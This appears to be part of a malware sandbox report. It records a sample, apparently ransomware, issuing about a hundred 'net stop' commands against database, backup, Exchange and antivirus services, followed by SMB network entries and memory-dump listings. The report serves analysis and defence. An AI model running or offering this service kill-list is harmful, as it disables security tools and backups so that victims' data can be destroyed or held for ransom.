C:\Windows\SysWOW64\net.exe

net stop MSExchangeMTA /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSExchangeMTA /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSExchangeSA /y

C:\Windows\SysWOW64\net.exe

net stop MSExchangeSA /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSExchangeSA /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSExchangeSRS /y

C:\Windows\SysWOW64\net.exe

net stop MSExchangeSRS /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSExchangeSRS /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSOLAP$SQL_2008 /y

C:\Windows\SysWOW64\net.exe

net stop MSOLAP$SQL_2008 /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSOLAP$SQL_2008 /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSOLAP$SYSTEM_BGC /y

C:\Windows\SysWOW64\net.exe

net stop MSOLAP$SYSTEM_BGC /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSOLAP$SYSTEM_BGC /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSOLAP$TPS /y

C:\Windows\SysWOW64\net.exe

net stop MSOLAP$TPS /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSOLAP$TPS /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSOLAP$TPSAMA /y

C:\Windows\SysWOW64\net.exe

net stop MSOLAP$TPSAMA /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSOLAP$TPSAMA /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQL$BKUPEXEC /y

C:\Windows\SysWOW64\net.exe

net stop MSSQL$BKUPEXEC /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQL$BKUPEXEC /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQL$ECWDB2 /y

C:\Windows\SysWOW64\net.exe

net stop MSSQL$ECWDB2 /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQL$ECWDB2 /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQL$PRACTICEMGT /y

C:\Windows\SysWOW64\net.exe

net stop MSSQL$PRACTICEMGT /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQL$PRACTICEMGT /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQL$PRACTTICEBGC /y

C:\Windows\SysWOW64\net.exe

net stop MSSQL$PRACTTICEBGC /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQL$PRACTTICEBGC /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQL$PROFXENGAGEMENT /y

C:\Windows\SysWOW64\net.exe

net stop MSSQL$PROFXENGAGEMENT /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQL$PROFXENGAGEMENT /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQL$SBSMONITORING /y

C:\Windows\SysWOW64\net.exe

net stop MSSQL$SBSMONITORING /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQL$SBSMONITORING /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQL$SHAREPOINT /y

C:\Windows\SysWOW64\net.exe

net stop MSSQL$SHAREPOINT /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQL$SHAREPOINT /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQL$SQL_2008 /y

C:\Windows\SysWOW64\net.exe

net stop MSSQL$SQL_2008 /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQL$SQL_2008 /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQL$SYSTEM_BGC /y

C:\Windows\SysWOW64\net.exe

net stop MSSQL$SYSTEM_BGC /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQL$SYSTEM_BGC /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQL$TPS /y

C:\Windows\SysWOW64\net.exe

net stop MSSQL$TPS /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQL$TPS /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQL$TPSAMA /y

C:\Windows\SysWOW64\net.exe

net stop MSSQL$TPSAMA /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQL$TPSAMA /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQL$VEEAMSQL2008R2 /y

C:\Windows\SysWOW64\net.exe

net stop MSSQL$VEEAMSQL2008R2 /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQL$VEEAMSQL2012 /y

C:\Windows\SysWOW64\net.exe

net stop MSSQL$VEEAMSQL2012 /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2012 /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQLFDLauncher /y

C:\Windows\SysWOW64\net.exe

net stop MSSQLFDLauncher /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQLFDLauncher /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQLFDLauncher$PROFXENGAGEMENT /y

C:\Windows\SysWOW64\net.exe

net stop MSSQLFDLauncher$PROFXENGAGEMENT /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQLFDLauncher$PROFXENGAGEMENT /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQLFDLauncher$SBSMONITORING /y

C:\Windows\SysWOW64\net.exe

net stop MSSQLFDLauncher$SBSMONITORING /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQLFDLauncher$SBSMONITORING /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQLFDLauncher$SHAREPOINT /y

C:\Windows\SysWOW64\net.exe

net stop MSSQLFDLauncher$SHAREPOINT /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQLFDLauncher$SHAREPOINT /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQLFDLauncher$SQL_2008 /y

C:\Windows\SysWOW64\net.exe

net stop MSSQLFDLauncher$SQL_2008 /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQLFDLauncher$SQL_2008 /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQLFDLauncher$SYSTEM_BGC /y

C:\Windows\SysWOW64\net.exe

net stop MSSQLFDLauncher$SYSTEM_BGC /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQLFDLauncher$SYSTEM_BGC /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQLFDLauncher$TPS /y

C:\Windows\SysWOW64\net.exe

net stop MSSQLFDLauncher$TPS /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQLFDLauncher$TPS /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQLFDLauncher$TPSAMA /y

C:\Windows\SysWOW64\net.exe

net stop MSSQLFDLauncher$TPSAMA /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQLFDLauncher$TPSAMA /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQLSERVER /y

C:\Windows\SysWOW64\net.exe

net stop MSSQLSERVER /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQLSERVER /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQLServerADHelper100 /y

C:\Windows\SysWOW64\net.exe

net stop MSSQLServerADHelper100 /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQLServerADHelper100 /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQLServerOLAPService /y

C:\Windows\SysWOW64\net.exe

net stop MSSQLServerOLAPService /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQLServerOLAPService /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MySQL57 /y

C:\Windows\SysWOW64\net.exe

net stop MySQL57 /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MySQL57 /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop ntrtscan /y

C:\Windows\SysWOW64\net.exe

net stop ntrtscan /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop ntrtscan /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop OracleClientCache80 /y

C:\Windows\SysWOW64\net.exe

net stop OracleClientCache80 /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop OracleClientCache80 /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop PDVFSService /y

C:\Windows\SysWOW64\net.exe

net stop PDVFSService /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop PDVFSService /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop POP3Svc /y

C:\Windows\SysWOW64\net.exe

net stop POP3Svc /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop POP3Svc /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop ReportServer /y

C:\Windows\SysWOW64\net.exe

net stop ReportServer /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop ReportServer /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop ReportServer$SQL_2008 /y

C:\Windows\SysWOW64\net.exe

net stop ReportServer$SQL_2008 /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop ReportServer$SQL_2008 /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop ReportServer$SYSTEM_BGC /y

C:\Windows\SysWOW64\net.exe

net stop ReportServer$SYSTEM_BGC /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop ReportServer$SYSTEM_BGC /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop ReportServer$TPS /y

C:\Windows\SysWOW64\net.exe

net stop ReportServer$TPS /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop ReportServer$TPS /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop ReportServer$TPSAMA /y

C:\Windows\SysWOW64\net.exe

net stop ReportServer$TPSAMA /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop ReportServer$TPSAMA /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop RESvc /y

C:\Windows\SysWOW64\net.exe

net stop RESvc /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop RESvc /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop sacsvr /y

C:\Windows\SysWOW64\net.exe

net stop sacsvr /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop sacsvr /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SamSs /y

C:\Windows\SysWOW64\net.exe

net stop SamSs /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SamSs /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SAVAdminService /y

C:\Windows\SysWOW64\net.exe

net stop SAVAdminService /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SAVAdminService /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SAVService /y

C:\Windows\SysWOW64\net.exe

net stop SAVService /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SAVService /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SDRSVC /y

C:\Windows\SysWOW64\net.exe

net stop SDRSVC /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SDRSVC /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SepMasterService /y

C:\Windows\SysWOW64\net.exe

net stop SepMasterService /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SepMasterService /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop ShMonitor /y

C:\Windows\SysWOW64\net.exe

net stop ShMonitor /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop ShMonitor /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop Smcinst /y

C:\Windows\SysWOW64\net.exe

net stop Smcinst /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop Smcinst /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SmcService /y

C:\Windows\SysWOW64\net.exe

net stop SmcService /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SmcService /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SMTPSvc /y

C:\Windows\SysWOW64\net.exe

net stop SMTPSvc /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SMTPSvc /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLAgent$BKUPEXEC /y

C:\Windows\SysWOW64\net.exe

net stop SQLAgent$BKUPEXEC /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLAgent$BKUPEXEC /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLAgent$ECWDB2 /y

C:\Windows\SysWOW64\net.exe

net stop SQLAgent$ECWDB2 /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLAgent$ECWDB2 /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLAgent$PRACTTICEBGC /y

C:\Windows\SysWOW64\net.exe

net stop SQLAgent$PRACTTICEBGC /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLAgent$PRACTTICEBGC /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLAgent$PRACTTICEMGT /y

C:\Windows\SysWOW64\net.exe

net stop SQLAgent$PRACTTICEMGT /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLAgent$PRACTTICEMGT /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLAgent$PROFXENGAGEMENT /y

C:\Windows\SysWOW64\net.exe

net stop SQLAgent$PROFXENGAGEMENT /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLAgent$PROFXENGAGEMENT /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLAgent$SBSMONITORING /y

C:\Windows\SysWOW64\net.exe

net stop SQLAgent$SBSMONITORING /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLAgent$SBSMONITORING /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLAgent$SHAREPOINT /y

C:\Windows\SysWOW64\net.exe

net stop SQLAgent$SHAREPOINT /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLAgent$SHAREPOINT /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLAgent$SQL_2008 /y

C:\Windows\SysWOW64\net.exe

net stop SQLAgent$SQL_2008 /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLAgent$SQL_2008 /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLAgent$SYSTEM_BGC /y

C:\Windows\SysWOW64\net.exe

net stop SQLAgent$SYSTEM_BGC /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLAgent$SYSTEM_BGC /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLAgent$TPS /y

C:\Windows\SysWOW64\net.exe

net stop SQLAgent$TPS /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLAgent$TPS /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLAgent$TPSAMA /y

C:\Windows\SysWOW64\net.exe

net stop SQLAgent$TPSAMA /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLAgent$TPSAMA /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLAgent$VEEAMSQL2008R2 /y

C:\Windows\SysWOW64\net.exe

net stop SQLAgent$VEEAMSQL2008R2 /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLAgent$VEEAMSQL2012 /y

C:\Windows\SysWOW64\net.exe

net stop SQLAgent$VEEAMSQL2012 /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2012 /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLBrowser /y

C:\Windows\SysWOW64\net.exe

net stop SQLBrowser /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLBrowser /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLSafeOLRService /y

C:\Windows\SysWOW64\net.exe

net stop SQLSafeOLRService /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLSafeOLRService /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLSERVERAGENT /y

C:\Windows\SysWOW64\net.exe

net stop SQLSERVERAGENT /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLSERVERAGENT /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLTELEMETRY /y

C:\Windows\SysWOW64\net.exe

net stop SQLTELEMETRY /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLTELEMETRY /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLTELEMETRY$ECWDB2 /y

C:\Windows\SysWOW64\net.exe

net stop SQLTELEMETRY$ECWDB2 /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLTELEMETRY$ECWDB2 /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLWriter /y

C:\Windows\SysWOW64\net.exe

net stop SQLWriter /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLWriter /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop VeeamBackupSvc /y

C:\Windows\SysWOW64\net.exe

net stop VeeamBackupSvc /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop VeeamBackupSvc /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop VeeamBrokerSvc /y

C:\Windows\SysWOW64\net.exe

net stop VeeamBrokerSvc /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop VeeamBrokerSvc /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop VeeamCatalogSvc /y

C:\Windows\SysWOW64\net.exe

net stop VeeamCatalogSvc /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop VeeamCatalogSvc /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop VeeamCloudSvc /y

C:\Windows\SysWOW64\net.exe

net stop VeeamCloudSvc /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop VeeamCloudSvc /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop VeeamDeploymentService /y

C:\Windows\SysWOW64\net.exe

net stop VeeamDeploymentService /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop VeeamDeploymentService /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop VeeamDeploySvc /y

C:\Windows\SysWOW64\net.exe

net stop VeeamDeploySvc /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop VeeamDeploySvc /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop VeeamEnterpriseManagerSvc /y

C:\Windows\SysWOW64\net.exe

net stop VeeamEnterpriseManagerSvc /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop VeeamEnterpriseManagerSvc /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop VeeamMountSvc /y

C:\Windows\SysWOW64\net.exe

net stop VeeamMountSvc /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop VeeamMountSvc /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop VeeamNFSSvc /y

C:\Windows\SysWOW64\net.exe

net stop VeeamNFSSvc /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop VeeamNFSSvc /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop VeeamRESTSvc /y

C:\Windows\SysWOW64\net.exe

net stop VeeamRESTSvc /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop VeeamRESTSvc /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop VeeamTransportSvc /y

C:\Windows\SysWOW64\net.exe

net stop VeeamTransportSvc /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop VeeamTransportSvc /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop W3Svc /y

C:\Windows\SysWOW64\net.exe

net stop W3Svc /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop W3Svc /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop wbengine /y

C:\Windows\SysWOW64\net.exe

net stop wbengine /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop wbengine /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop WRSVC /y

C:\Windows\SysWOW64\net.exe

net stop WRSVC /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop WRSVC /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQL$VEEAMSQL2008R2 /y

C:\Windows\SysWOW64\net.exe

net stop MSSQL$VEEAMSQL2008R2 /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLAgent$VEEAMSQL2008R2 /y

C:\Windows\SysWOW64\net.exe

net stop SQLAgent$VEEAMSQL2008R2 /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop VeeamHvIntegrationSvc /y

C:\Windows\SysWOW64\net.exe

net stop VeeamHvIntegrationSvc /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop VeeamHvIntegrationSvc /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop swi_update /y

C:\Windows\SysWOW64\net.exe

net stop swi_update /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop swi_update /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLAgent$CXDB /y

C:\Windows\SysWOW64\net.exe

net stop SQLAgent$CXDB /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLAgent$CXDB /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLAgent$CITRIX_METAFRAME /y

C:\Windows\SysWOW64\net.exe

net stop SQLAgent$CITRIX_METAFRAME /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLAgent$CITRIX_METAFRAME /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop "SQL Backups" /y

C:\Windows\SysWOW64\net.exe

net stop "SQL Backups" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQL Backups" /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQL$PROD /y

C:\Windows\SysWOW64\net.exe

net stop MSSQL$PROD /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQL$PROD /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop "Zoolz 2 Service" /y

C:\Windows\SysWOW64\net.exe

net stop "Zoolz 2 Service" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Zoolz 2 Service" /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQLServerADHelper /y

C:\Windows\SysWOW64\net.exe

net stop MSSQLServerADHelper /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQLServerADHelper /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLAgent$PROD /y

C:\Windows\SysWOW64\net.exe

net stop SQLAgent$PROD /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLAgent$PROD /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop msftesql$PROD /y

C:\Windows\SysWOW64\net.exe

net stop msftesql$PROD /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop msftesql$PROD /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop NetMsmqActivator /y

C:\Windows\SysWOW64\net.exe

net stop NetMsmqActivator /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop NetMsmqActivator /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop EhttpSrv /y

C:\Windows\SysWOW64\net.exe

net stop EhttpSrv /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop EhttpSrv /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop ekrn /y

C:\Windows\SysWOW64\net.exe

net stop ekrn /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop ekrn /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop ESHASRV /y

C:\Windows\SysWOW64\net.exe

net stop ESHASRV /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop ESHASRV /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQL$SOPHOS /y

C:\Windows\SysWOW64\net.exe

net stop MSSQL$SOPHOS /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQL$SOPHOS /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLAgent$SOPHOS /y

C:\Windows\SysWOW64\net.exe

net stop SQLAgent$SOPHOS /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLAgent$SOPHOS /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop AVP /y

C:\Windows\SysWOW64\net.exe

net stop AVP /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop AVP /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop klnagent /y

C:\Windows\SysWOW64\net.exe

net stop klnagent /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop klnagent /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQL$SQLEXPRESS /y

C:\Windows\SysWOW64\net.exe

net stop MSSQL$SQLEXPRESS /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQL$SQLEXPRESS /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLAgent$SQLEXPRESS /y

C:\Windows\SysWOW64\net.exe

net stop SQLAgent$SQLEXPRESS /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLAgent$SQLEXPRESS /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop wbengine /y

C:\Windows\SysWOW64\net.exe

net stop wbengine /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop wbengine /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop mfefire /y

C:\Windows\SysWOW64\net.exe

net stop mfefire /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop mfefire /y

Network

Country Destination Domain Proto
N/A 10.127.0.1:445 tcp
N/A 10.127.0.1:139 tcp

Files

memory/2620-115-0x0000000000000000-mapping.dmp

memory/2700-116-0x0000000000000000-mapping.dmp

memory/2612-117-0x0000000000000000-mapping.dmp

memory/4092-118-0x0000000000000000-mapping.dmp

memory/3440-119-0x0000000000000000-mapping.dmp

memory/1292-120-0x0000000000000000-mapping.dmp

memory/400-121-0x0000000000000000-mapping.dmp

memory/1256-122-0x0000000000000000-mapping.dmp

memory/948-123-0x0000000000000000-mapping.dmp

memory/2912-124-0x0000000000000000-mapping.dmp

memory/864-125-0x0000000000000000-mapping.dmp

memory/3936-126-0x0000000000000000-mapping.dmp

memory/3956-127-0x0000000000000000-mapping.dmp

memory/3628-128-0x0000000000000000-mapping.dmp

memory/3976-129-0x0000000000000000-mapping.dmp

memory/1796-130-0x0000000000000000-mapping.dmp

memory/2856-131-0x0000000000000000-mapping.dmp

memory/1780-132-0x0000000000000000-mapping.dmp

memory/3856-133-0x0000000000000000-mapping.dmp

memory/2756-134-0x0000000000000000-mapping.dmp

memory/3456-135-0x0000000000000000-mapping.dmp

memory/2656-136-0x0000000000000000-mapping.dmp

memory/1896-137-0x0000000000000000-mapping.dmp

